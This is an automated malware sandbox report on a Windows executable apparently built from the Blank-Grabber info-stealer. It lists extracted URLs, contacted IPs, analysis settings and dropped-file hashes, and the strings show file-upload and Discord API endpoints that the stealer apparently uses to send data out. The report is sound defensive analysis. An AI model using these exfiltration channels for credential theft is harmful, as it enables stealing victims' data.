https://sync.ipredictive.com/d/sync/cookie/generic?https://cm.g.doubleclick.net/pixel?google_nid=adelphic_mobile&google_gid=CAESEFdi1-RiPfWOI2CLRzbOGh8&google_cver=1&google_push=AXcoOmRs--NX_amzQoFfaVNg5QoiiG0PbKRUiH2xlJkIPOhaYBZjwU9VO-TZql-FDrFlnoZ8M75CK8ZQ9kFGCZP5OX1boLe0fbMXAQ&google_hm=${ADELPHIC_CUID_B64}	false
https://trksyln.net/resources/css/navbar.css	false
https://match.prod.bidr.io/cookie-sync/adx?google_gid=CAESEDiYK4sqMzOUbRWTRd1nDCw&google_cver=1&google_push=AXcoOmTo2EAoqgbbw2Cb7fAUVP11_HvIEeWtIz6kljuEJPQ-1zPelC1FFe0JAUhRlBsW8tvUPC7tKMRWC2hCdktOiSxuOb6V8OXC1zof&_bee_ppp=1	false

URLs from Memory and Binaries

Name	Source	Malicious
https://duckduckgo.com/chrome_newtab	El9HaBFrFM.exe, 00000001.00000002.2251875096.0000025068C36000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/Blank-c/BlankOBF	El9HaBFrFM.exe, 00000001.00000003.1699429715.0000025068641000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1702409710.0000025068313000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1701153171.000002506830E000.00000004.00000020.00020000.00000000.sdmp	false
https://duckduckgo.com/ac/?q=	El9HaBFrFM.exe, 00000001.00000002.2251875096.0000025068C36000.00000004.00000020.00020000.00000000.sdmp	false
http://crl.microsoft	powershell.exe, 0000002E.00000002.1945615374.0000026CB6334000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	El9HaBFrFM.exe, 00000001.00000002.2245395851.00000250660C7000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1693415514.0000025067C31000.00000004.00000020.00020000.00000000.sdmp	false
https://www.leboncoin.fr/	El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068AFC000.00000004.00001000.00020000.00000000.sdmp	false
https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-file	El9HaBFrFM.exe, 00000001.00000003.1894005943.0000025068450000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1787479378.00000250685A2000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2249686549.0000025068450000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1711381621.00000250685A2000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1890133432.00000250685A2000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2250334235.00000250685A2000.00000004.00000020.00020000.00000000.sdmp	false
https://trksyln.net/Download/thankyou	El9HaBFrFM.exe, 00000001.00000003.1710988652.0000025068B51000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1711527664.0000025069462000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000012.00000000.1715370001.0000026C525E2000.00000002.00000001.01000000.00000016.sdmp	false
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64	El9HaBFrFM.exe, 00000001.00000003.1707245032.0000025067E9F000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2249310602.0000025067E40000.00000004.00000020.00020000.00000000.sdmp	false
https://g.live.com/odclientsettings/Prod.C:	svchost.exe, 0000003D.00000003.1851285401.000001C1A8536000.00000004.00000800.00020000.00000000.sdmp	false
https://api.anonfiles.com/upload	El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmp	false
https://www.msn.com	El9HaBFrFM.exe, 00000001.00000002.2252567268.0000025068E04000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2254155732.00000250698AC000.00000004.00001000.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2252567268.0000025068DF4000.00000004.00000020.00020000.00000000.sdmp	false
https://nuget.org/nuget.exe	powershell.exe, 00000006.00000002.1957704599.0000021ED7999000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.1947586190.0000026CB98F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2087591668.0000026CC8143000.00000004.00000800.00020000.00000000.sdmp	false
https://discord.com/api/v9/users/	El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963	El9HaBFrFM.exe, 00000001.00000002.2250811628.0000025068640000.00000004.00001000.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1711133484.000002506853A000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000006.00000002.1890826946.0000021EC7921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.1947586190.0000026CB7F81000.00000004.00000800.00020000.00000000.sdmp	false
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	svchost.exe, 0000003D.00000003.1851285401.000001C1A85A2000.00000004.00000800.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename	El9HaBFrFM.exe, 00000001.00000002.2246526490.00000250679A0000.00000004.00001000.00020000.00000000.sdmp	false
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy	El9HaBFrFM.exe, 00000001.00000002.2251098631.0000025068940000.00000004.00001000.00020000.00000000.sdmp	false
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000002E.00000002.1947586190.0000026CB9898000.00000004.00000800.00020000.00000000.sdmp	false
http://www.trksyln.net/tgmacro/downloadl	bound.exe, 00000012.00000002.1798344120.0000026C6CDF0000.00000004.00000020.00020000.00000000.sdmp	false
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000002E.00000002.1947586190.0000026CB9898000.00000004.00000800.00020000.00000000.sdmp	false
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	El9HaBFrFM.exe, 00000001.00000002.2245395851.00000250660C7000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2249113560.0000025067C00000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1693415514.0000025067C31000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/python/cpython/issues/86361.	El9HaBFrFM.exe, 00000001.00000002.2249310602.0000025067E40000.00000004.00000020.00020000.00000000.sdmp	false
http://www.microsoft.coEu	powershell.exe, 00000006.00000002.1984874757.0000021EDFF70000.00000004.00000020.00020000.00000000.sdmp	false
https://contoso.com/Icon	powershell.exe, 0000002E.00000002.2087591668.0000026CC8010000.00000004.00000800.00020000.00000000.sdmp	false
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	El9HaBFrFM.exe, 00000001.00000002.2251875096.0000025068C36000.00000004.00000020.00020000.00000000.sdmp	false
https://httpbin.org/	El9HaBFrFM.exe, 00000001.00000003.1711133484.00000250684F2000.00000004.00000020.00020000.00000000.sdmp	false
http://crl.ver)	svchost.exe, 0000003D.00000002.2950366204.000001C1A8600000.00000004.00000020.00020000.00000000.sdmp	false
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	El9HaBFrFM.exe, 00000000.00000003.1687680528.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module	El9HaBFrFM.exe, 00000001.00000002.2246526490.00000250679A0000.00000004.00001000.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches	El9HaBFrFM.exe, 00000001.00000002.2246526490.00000250679A0000.00000004.00001000.00020000.00000000.sdmp	false
https://www.ecosia.org/newtab/	El9HaBFrFM.exe, 00000001.00000002.2251875096.0000025068C36000.00000004.00000020.00020000.00000000.sdmp	false
https://www.youtube.com/	El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068AFC000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/Pester/Pester	powershell.exe, 0000002E.00000002.1947586190.0000026CB9898000.00000004.00000800.00020000.00000000.sdmp	false
https://images-ext-1.discordapp.net/external/etSU0hGkd0ttMXA41AUjUl74oI1ajbez8WS2N-KLvK4/https/raw.g	El9HaBFrFM.exe, 00000001.00000003.2243032085.0000025069320000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.2243097224.00000250685B7000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2251875096.0000025068C24000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2254069352.0000025069320000.00000004.00000020.00020000.00000000.sdmp	false
http://trksyln.net/tgmacro/data/VersionInfo.jsondhttp://trksyln.net/tgmacro/data/ShadyWebSites.json	El9HaBFrFM.exe, 00000001.00000003.1710988652.0000025068B51000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1711527664.0000025069462000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000012.00000000.1715370001.0000026C525E2000.00000002.00000001.01000000.00000016.sdmp	false
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535	El9HaBFrFM.exe, 00000001.00000002.2249310602.0000025067E40000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1787479378.00000250684C6000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2250100607.00000250684C6000.00000004.00000020.00020000.00000000.sdmp	false
https://MD8.mozilla.org/1/m	El9HaBFrFM.exe, 00000001.00000002.2252567268.0000025068E08000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2254155732.0000025069870000.00000004.00001000.00020000.00000000.sdmp	false
https://www.bbc.co.uk/	El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068AFC000.00000004.00001000.00020000.00000000.sdmp	false
https://bugzilla.mo	El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068B10000.00000004.00001000.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068AC4000.00000004.00001000.00020000.00000000.sdmp	false
http://tools.ietf.org/html/rfc6125#section-6.4.3	El9HaBFrFM.exe, 00000001.00000002.2251098631.0000025068940000.00000004.00001000.00020000.00000000.sdmp	false
https://trksyln.net/tgmacro/HowToUse/MainMenuahttp://trksyln.net/tgmacro/data/VersionInfo.jsonehttp:	El9HaBFrFM.exe, 00000001.00000003.1710988652.0000025068B51000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1711527664.0000025069462000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000012.00000000.1715370001.0000026C525E2000.00000002.00000001.01000000.00000016.sdmp	false
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000006.00000002.1890826946.0000021EC7B49000.00000004.00000800.00020000.00000000.sdmp	false
http://www.trksyln.net/tgmacro/downloadu	bound.exe, 00000012.00000002.1798344120.0000026C6CDF0000.00000004.00000020.00020000.00000000.sdmp	false
https://google.com/mail	El9HaBFrFM.exe, 00000001.00000002.2249686549.000002506839D000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1787479378.00000250684C6000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2250100607.00000250684C6000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1711133484.00000250684F2000.00000004.00000020.00020000.00000000.sdmp	false
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	El9HaBFrFM.exe, 00000001.00000003.2241890950.0000025068FFA000.00000004.00000020.00020000.00000000.sdmp	false
https://www.iqiyi.com/	El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068AFC000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.	El9HaBFrFM.exe, 00000001.00000002.2249686549.0000025068240000.00000004.00000020.00020000.00000000.sdmp	false
http://ocsp.sectigo.com0	El9HaBFrFM.exe, 00000000.00000003.1687680528.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	false
https://tools.ietf.org/html/rfc7231#section-4.3.6)	El9HaBFrFM.exe, 00000001.00000002.2249686549.0000025068240000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2249686549.000002506842B000.00000004.00000020.00020000.00000000.sdmp	false
https://discordapp.com/api/v9/users/	El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec	El9HaBFrFM.exe, 00000001.00000002.2246526490.00000250679A0000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/urllib3/urllib3/issues/2920	El9HaBFrFM.exe, 00000001.00000002.2251098631.0000025068940000.00000004.00001000.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1711133484.00000250684F2000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data	El9HaBFrFM.exe, 00000001.00000002.2245395851.00000250660C7000.00000004.00000020.00020000.00000000.sdmp	false
https://account.bellmedia.c	El9HaBFrFM.exe, 00000001.00000002.2254155732.00000250698B4000.00000004.00001000.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2252567268.0000025068E04000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2252567268.0000025068DF4000.00000004.00000020.00020000.00000000.sdmp	false
https://login.microsoftonline.com	El9HaBFrFM.exe, 00000001.00000003.1783485921.0000025068C0D000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2254155732.000002506988C000.00000004.00001000.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2252567268.0000025068E04000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068AC4000.00000004.00001000.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2252567268.0000025068DF4000.00000004.00000020.00020000.00000000.sdmp	false
http://cacerts.digij	El9HaBFrFM.exe, 00000000.00000003.1684380526.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686891261.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	false
http://crl.thawte.com/ThawteTimestampingCA.crl0	El9HaBFrFM.exe, 00000000.00000003.1687680528.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	false
https://www.zhihu.com/	El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068B10000.00000004.00001000.00020000.00000000.sdmp	false
http://www.trksyln.netYhttps://trksyln.net/tgmacro/HowToUse/Actionsahttps://trksyln.net/tgmacro/HowT	El9HaBFrFM.exe, 00000001.00000003.1710988652.0000025068B51000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1711527664.0000025069462000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000012.00000000.1715370001.0000026C525E2000.00000002.00000001.01000000.00000016.sdmp	false
https://api.gofile.io/getServer	El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmp	false
https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png	El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2251875096.0000025068C24000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2254069352.0000025069320000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2250334235.00000250685A2000.00000004.00000020.00020000.00000000.sdmp	false
http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/	El9HaBFrFM.exe, 00000001.00000002.2249310602.0000025067E40000.00000004.00000020.00020000.00000000.sdmp	false
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	El9HaBFrFM.exe, 00000001.00000002.2251875096.0000025068C36000.00000004.00000020.00020000.00000000.sdmp	false
https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz	El9HaBFrFM.exe, 00000001.00000003.1703337610.0000025067FF5000.00000004.00000020.00020000.00000000.sdmp	false
https://api.anonfiles.com/uploadr#	El9HaBFrFM.exe, 00000001.00000003.1703337610.0000025067FF5000.00000004.00000020.00020000.00000000.sdmp	false
https://www.wykop.pl/	El9HaBFrFM.exe, 00000001.00000002.2251098631.0000025068940000.00000004.00001000.00020000.00000000.sdmp	false
https://docs.python.org/3/howto/mro.html.	El9HaBFrFM.exe, 00000001.00000003.1693682423.0000025067CCD000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2249485409.0000025068040000.00000004.00001000.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1693415514.0000025067CB8000.00000004.00000020.00020000.00000000.sdmp	false
https://twitter.com/	El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068AFC000.00000004.00001000.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1787479378.00000250684C6000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2250100607.00000250684C6000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1787479378.00000250685A2000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1711381621.00000250685A2000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1890133432.00000250685A2000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2250334235.00000250685A2000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1711133484.00000250684F2000.00000004.00000020.00020000.00000000.sdmp	false
https://www.olx.pl/	El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068AFC000.00000004.00001000.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068B10000.00000004.00001000.00020000.00000000.sdmp	false
https://support.mozilla.org/products/firefox	El9HaBFrFM.exe, 00000001.00000003.1737193360.0000025068BE3000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2249113560.0000025067CB8000.00000004.00000020.00020000.00000000.sdmp	false
https://google.com/mail/	El9HaBFrFM.exe, 00000001.00000002.2249310602.0000025067E40000.00000004.00000020.00020000.00000000.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
8.2.111.136	sync2-dsp.e-volution.ai	United States	46636	NATCOWEBUS	false
142.250.185.228	www.google.com	United States	15169	GOOGLEUS	false
35.190.0.66	ads.travelaudience.com	United States	15169	GOOGLEUS	false
216.239.34.181	analytics-alv.google.com	United States	15169	GOOGLEUS	false
151.101.193.229	jsdelivr.map.fastly.net	United States	54113	FASTLYUS	false
35.204.158.49	um.simpli.fi	United States	15169	GOOGLEUS	false
51.89.9.252	onetag-sys.com	France	16276	OVHFR	false
34.160.236.64	tagr-pixel-nginx-odr-euw4.mookie1.com	United States	2686	ATGS-MMD-ASUS	false
142.250.185.142	www3.l.google.com	United States	15169	GOOGLEUS	false
151.101.66.137	code.jquery.com	United States	54113	FASTLYUS	true
35.71.131.137	match.adsrvr.org	United States	237	MERIT-AS-14US	false
142.250.186.33	unknown	United States	15169	GOOGLEUS	false
174.137.133.49	dsp.adkernel.com	United States	27257	WEBAIR-INTERNETUS	false
142.250.185.66	unknown	United States	15169	GOOGLEUS	false
52.16.92.15	ds-pr-bh.ybp.gysm.yahoodns.net	United States	16509	AMAZON-02US	false
172.217.18.4	unknown	United States	15169	GOOGLEUS	false
160.153.155.187	trksyln.net	United States	21501	GODADDY-AMSDE	true
107.21.226.44	sync.ipredictive.com	United States	14618	AMAZON-AESUS	false
172.217.18.2	td.doubleclick.net	United States	15169	GOOGLEUS	false
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
172.217.16.193	unknown	United States	15169	GOOGLEUS	false
64.233.167.156	stats.g.doubleclick.net	United States	15169	GOOGLEUS	false
142.250.186.174	unknown	United States	15169	GOOGLEUS	false
162.159.128.233	discord.com	United States	13335	CLOUDFLARENETUS	true
216.58.206.34	ep1.adtrafficquality.google	United States	15169	GOOGLEUS	false
208.93.169.131	am1-direct-bgp.contextweb.com	United States	26228	SERVEPATHUS	false
185.98.54.153	s.uuidksinc.net	Netherlands	39572	ADVANCEDHOSTERS-ASNL	false
20.157.217.118	gw-c-eu-isp.temu.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
185.15.59.240	upload.wikimedia.org	Netherlands	14907	WIKIMEDIAUS	false
178.250.1.9	widget.nl3.vip.prod.criteo.com	France	44788	ASN-CRITEO-EUROPEFR	false
74.119.117.16	widget.us5.vip.prod.criteo.com	United States	19750	AS-CRITEOUS	false
216.58.206.65	ep2.adtrafficquality.google	United States	15169	GOOGLEUS	false
54.170.20.205	match.prod.bidr.io	United States	16509	AMAZON-02US	false
35.214.168.80	gtrace.mediago.io	United States	19527	GOOGLE-2US	false
54.88.211.52	sync.srv.stackadapt.com	United States	14618	AMAZON-AESUS	false

Private

IP
192.168.2.4
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1546321
Start date and time:	2024-10-31 19:18:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	103
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	El9HaBFrFM.exe renamed because original name is a hash value
Original Sample Name:	cf691d4fccff15f697093ffc3b45d0e1c76725b701fb8f86ad39bcf444b770c6.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.expl.evad.winEXE@184/327@106/38
EGA Information:	Successful, ratio: 42.9%
HCA Information:	Successful, ratio: 92% Number of executed functions: 102 Number of non-executed functions: 192
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 216.58.212.131, 142.250.185.131, 142.250.186.142, 173.194.76.84, 34.104.35.123, 4.175.87.197, 142.250.186.136, 172.217.18.98, 172.64.147.188, 104.18.40.68, 93.184.221.240, 172.67.139.119, 104.21.26.223, 142.250.184.234, 172.217.18.3, 142.250.185.238, 104.18.40.209, 172.64.147.47, 192.229.221.95, 142.250.184.226, 142.250.184.200, 20.242.39.171, 142.250.185.174, 184.28.90.27, 216.58.206.67, 142.250.185.161, 142.250.186.130, 142.250.186.66, 13.107.42.14, 89.207.16.201, 172.105.220.23, 172.105.213.147, 172.104.64.149, 172.105.221.240, 139.162.84.221, 139.162.117.143, 172.105.199.172, 172.104.105.5, 172.105.235.90, 172.105.221.29, 172.105.203.31, 139.162.78.222, 172.104.70.67, 172.104.121.22, 172.105.232.22, 216.58.206.74, 142.250.181.227, 142.250.186.98, 172.217.16.194, 142.250.184.194, 142.250.185.130, 20.3.187.198, 142.250.185.162, 142.250.184.225, 142.250.185.227, 142.250.186.34, 142.250.185.99, 142.250.185.194
Excluded domains from analysis (whitelisted): www.googleadservices.com, ka-f.fontawesome.com.cdn.cloudflare.net, slscr.update.microsoft.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, l-0005.l-msedge.net, gocm-geo.c.appier.net.akadns.net, clients2.google.com, ocsp.digicert.com, www.googletagmanager.com, e16604.g.akamaiedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, a.fsdn.com.cdn.cloudflare.net, www.gstatic.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, www.google-analytics.com, kit.fontawesome.com.cdn.cloudflare.net, temu-gtm.trafficmanager.net, www-linkedin-com.l-0005.l-msedge.net, clients1.google.com, fonts.googleapis.com, fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, ctldl.windowsup
Execution Graph export aborted for target bound.exe, PID 7944 because it is empty
Execution Graph export aborted for target mshta.exe, PID 7912 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 7692 because it is empty
Execution Graph export aborted for target powershell.exe, PID 8712 because it is empty
HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: El9HaBFrFM.exe

Simulations

Behavior and APIs

Time	Type	Description
14:19:07	API Interceptor	161x Sleep call for process: powershell.exe modified
14:19:07	API Interceptor	5x Sleep call for process: WMIC.exe modified
14:19:17	API Interceptor	2x Sleep call for process: svchost.exe modified

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	1.3277868142140765
Encrypted:	false
SSDEEP:	3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrM:KooCEYhgYEL0In
MD5:	8DAED9FD50E02B2ED1062E72E0537846
SHA1:	FF3A3F48411BE89DBB887F3DB9B933B1E02DE761
SHA-256:	FAD9F978B05DF04B50EA1F31BE1D397B1332E719BDDB9420447431596124F0DE
SHA-512:	2BCE2A77BDF8C19ED3858B63409515B943152C4B9065F69E6E2D0E3B70CAE83B0D52D1CDEB619D6F6684BC803B8A685287219E5A9BB1340E15DDB44725EFEA72
Malicious:	false
Reputation:	unknown
Preview:	z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x9e2bf7d2, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.4221639830672254
Encrypted:	false
SSDEEP:	1536:pSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:paza/vMUM2Uvz7DO
MD5:	E67DFDE874D7C98C5557729BE735C16B
SHA1:	D3438E98C7B2355A23FF254849C241F330ECDC4A
SHA-256:	FBF66C75B5B928F096B288633DBDDFFE1A38CECD2918EBBDCAF83A9BB3B79CD8
SHA-512:	19C82D87511AB24CEAED0A8DFFB987B1C893743CD19E6C618789A3B0EEEBCBFDB307E5A6DA874338863CE5EEE284D7A9B1FEAB6F2CCD03BEDCE5E07F4C1DF751
Malicious:	false
Reputation:	unknown
Preview:	.+..... .......A.......X\...;...{......................0.!..........{A......\|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................c.......\|w..................o.x.....\|7..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07708221772740234
Encrypted:	false
SSDEEP:	3:fm/8YeB3ZSmvjn13a/NtFbtlollcVO/lnlZMxZNQl:OUzBpSi53qHFbIOewk
MD5:	69165412A0BCFB79AF2836486CD0CCA0
SHA1:	803E260E91226DD53C36DA6A55A3CF5BFEA14020
SHA-256:	77B0B2F65E73E64A161BFA6BE55EE4B3A6706080746F31248F998DD5481276F3
